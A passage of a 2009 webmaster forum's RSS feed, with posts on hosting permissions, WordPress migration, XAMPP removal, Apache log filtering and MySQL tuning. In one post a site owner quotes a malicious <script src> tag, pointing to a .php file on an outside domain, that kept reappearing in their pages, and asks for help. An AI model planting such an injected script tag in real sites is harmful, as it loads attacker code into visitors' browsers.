Details:<br />
200 Type set to I<br />
227 Entering Passive Mode (74,208,80,155,207,218).<br />
550 index_body.html: Permission denied<br />
<br />
Does 1and1 block you from editing their forum they give you as an app? <br />
<br />
Thanks :D</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>bdg1115</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/190035-forum-upload-issues-2-a.html</guid>
		</item>
		<item>
			<title>Who here is familiar with ELGG?</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/190030-who-here-is-familiar-with-elgg.html</link>
			<pubDate>Sun, 25 Oct 2009 18:47:23 GMT</pubDate>
			<description><![CDATA[I and my business partners are screwing around with ELGG and while there's a lot of potential locked deep in it, it's got a lot of issues.]]></description>
			<content:encoded><![CDATA[<div>I and my business partners are screwing around with ELGG and while there's a lot of potential locked deep in it, it's got a lot of issues.</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>Fudge</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/190030-who-here-is-familiar-with-elgg.html</guid>
		</item>
		<item>
			<title>How do I incorporate my current site into a new Wordpress site?</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/189980-how-do-i-incorporate-my-current.html</link>
			<pubDate>Sun, 25 Oct 2009 00:41:03 GMT</pubDate>
			<description><![CDATA[Hi Everyone, I recently purchased an xhtml/css website template and began work on it. I really like the way it looks and I'd like to keep it, even...]]></description>
			<content:encoded><![CDATA[<div>Hi Everyone, I recently purchased an xhtml/css website template and began work on it. I really like the way it looks and I'd like to keep it, even though I want to turn it into a Wordpress site. I downloaded Wordpress 2.8.5 but I know very little about php and I know nothing about Wordpress. I am using Dreamweaver MX and my MySQL database is located on Fatcow.com.</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>crash3173</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/189980-how-do-i-incorporate-my-current.html</guid>
		</item>
		<item>
			<title>Forum Upload issues</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/189976-forum-upload-issues.html</link>
			<pubDate>Sat, 24 Oct 2009 21:18:25 GMT</pubDate>
			<description>I installed a forum using the 1and1 app things. Then I customized the files to make them original, and when I upload them it says denied, I dont have...</description>
			<content:encoded><![CDATA[<div>I installed a forum using the 1and1 app things. Then I customized the files to make them original, and when I upload them it says denied, I dont have permissions. But its mine! haha. Does 1and1 put a block on this?</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>bdg1115</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/189976-forum-upload-issues.html</guid>
		</item>
		<item>
			<title>How do I uninstall xampp?</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/189891-how-do-i-uninstall-xampp.html</link>
			<pubDate>Fri, 23 Oct 2009 12:51:43 GMT</pubDate>
			<description>Trying to play with Joomla. So far my screen has been continually filled up with error messages, and searching on google I discovered that the...</description>
			<content:encoded><![CDATA[<div>Trying to play with Joomla. So far my screen has been continually filled up with error messages, and searching on google I discovered that the problem is probably due to the fact that I have xampp 1.7.2 and apparently it's not compatible. So the advice was, uninstall the newer xampp and replace with 1.7.1<br />
<br />
I am trying to follow these &quot;instructions&quot; from the apachefriends website:<br />
<font color="black"><br />
<i><b>Method B: just delete it</b><br />
<br />
</i></font><i><font color="black">     It's also possible to remove/delete by your own: </font></i><br />
  <ol style="list-style-type: decimal"><li><i><font color="black">stop all serves</font></i></li>
<li><i><font color="black">remove the Windows services</font></i></li>
<li><i><font color="black">stop the XAMPP Control</font></i></li>
<li><i><font color="black">delete the startmenu/desktio icons</font></i></li>
<li><i><font color="black">delete the XAMPP directory</font></i></li>
</ol>So I stopped the <i>servers</i> (I guess that's what they mean)(i.e apache and mysql)<br />
How do I remove the windows services? I went to control panel/admin/services but then I'm lost.<br />
What does &quot;stop the xampp control&quot; mean?<br />
Have deleted the desktop icon, but how do I delete from the start menu?<br />
<br />
Many thanks</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>magicvw</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/189891-how-do-i-uninstall-xampp.html</guid>
		</item>
		<item>
			<title>Html Script Injecton</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/189875-html-script-injecton.html</link>
			<pubDate>Fri, 23 Oct 2009 07:40:49 GMT</pubDate>
			<description><![CDATA[Hi, 
in the last days i've a problem with my web site, in all html page appear this tag: 
 
<script...]]></description>
			<content:encoded><![CDATA[<div>Hi,<br />
in the last days i've a problem with my web site, in all html page appear this tag:<br />
<br />
&lt;script src=http://tintasecuador.com/tarjeta/.ftpquota.php &gt;&lt;/script&gt;&lt;body bgcolor=&quot;#081052&quot; alink=&quot;#ff0000&quot; link=&quot;#80ffff&quot; vlink=&quot;#80ffff&quot; &gt;<br />
<br />
but, obviously, i never write it!<br />
<br />
Try to reload the entire web site, and change logon credentials, but, in random time, the script reappear!!!<br />
<br />
.... Any idea?</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>vultus5</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/189875-html-script-injecton.html</guid>
		</item>
		<item>
			<title>Logs for specific date</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/189827-logs-for-specific-date.html</link>
			<pubDate>Thu, 22 Oct 2009 18:57:18 GMT</pubDate>
			<description>How to check apache error logs for a specific date for the specific domain?  
 
When I do cat error_logs | grep username I got a list of error logs...</description>
			<content:encoded><![CDATA[<div>How to check apache error logs for a specific date for the specific domain? <br />
<br />
When I do cat error_logs | grep username I got a list of error logs for that domain but it displays all the dates. I want to know the command to check logs for a particular date?</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>thewebhostingdi</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/189827-logs-for-specific-date.html</guid>
		</item>
		<item>
			<title>MySQL optimization for Chat Server(red5)</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/189806-mysql-optimization-for-chat-server-red5.html</link>
			<pubDate>Thu, 22 Oct 2009 13:11:44 GMT</pubDate>
			<description>guys, we are running chat server(red5). servers specs are: Intel Xeon QuadCore SingleProc Sata,  
 
2GB ram with latest cPanel, apache and...</description>
			<content:encoded><![CDATA[<div>guys, we are running chat server(red5). servers specs are: Intel Xeon QuadCore SingleProc Sata, <br />
<br />
2GB ram with latest cPanel, apache and mysql...server is running fine with the mysql config, still i <br />
<br />
want to show my mysql config file to you guys so that you can suggest me something more for <br />
<br />
better performance for those chatrooms.<br />
<br />
Here is my my.cnf:<br />
============================================<br />
[mysqld]<br />
set-variable = max_connections=300<br />
safe-show-database<br />
max_user_connection=100<br />
query_cache_size=256M<br />
query_cache_limit=32M<br />
query_cache_type = 1<br />
max_allowed_packet=16M<br />
table_cache=1024<br />
thread_cache_size = 256<br />
key_buffer_size=64M<br />
wait_timeout=75<br />
connect_timeout=50<br />
interactive_timeout=100<br />
#slave_net_timeout=35<br />
tmp_table_size=128M<br />
read_buffer_size=2M<br />
sort_buffer_size=2M<br />
read_rnd_buffer_size=2M<br />
myisam_sort_buffer_size=128M<br />
record_buffer=1M<br />
thread_concurrency=4<br />
local-infile=0<br />
============================================</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>ihostman</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/189806-mysql-optimization-for-chat-server-red5.html</guid>
		</item>
	</channel>
</rss>
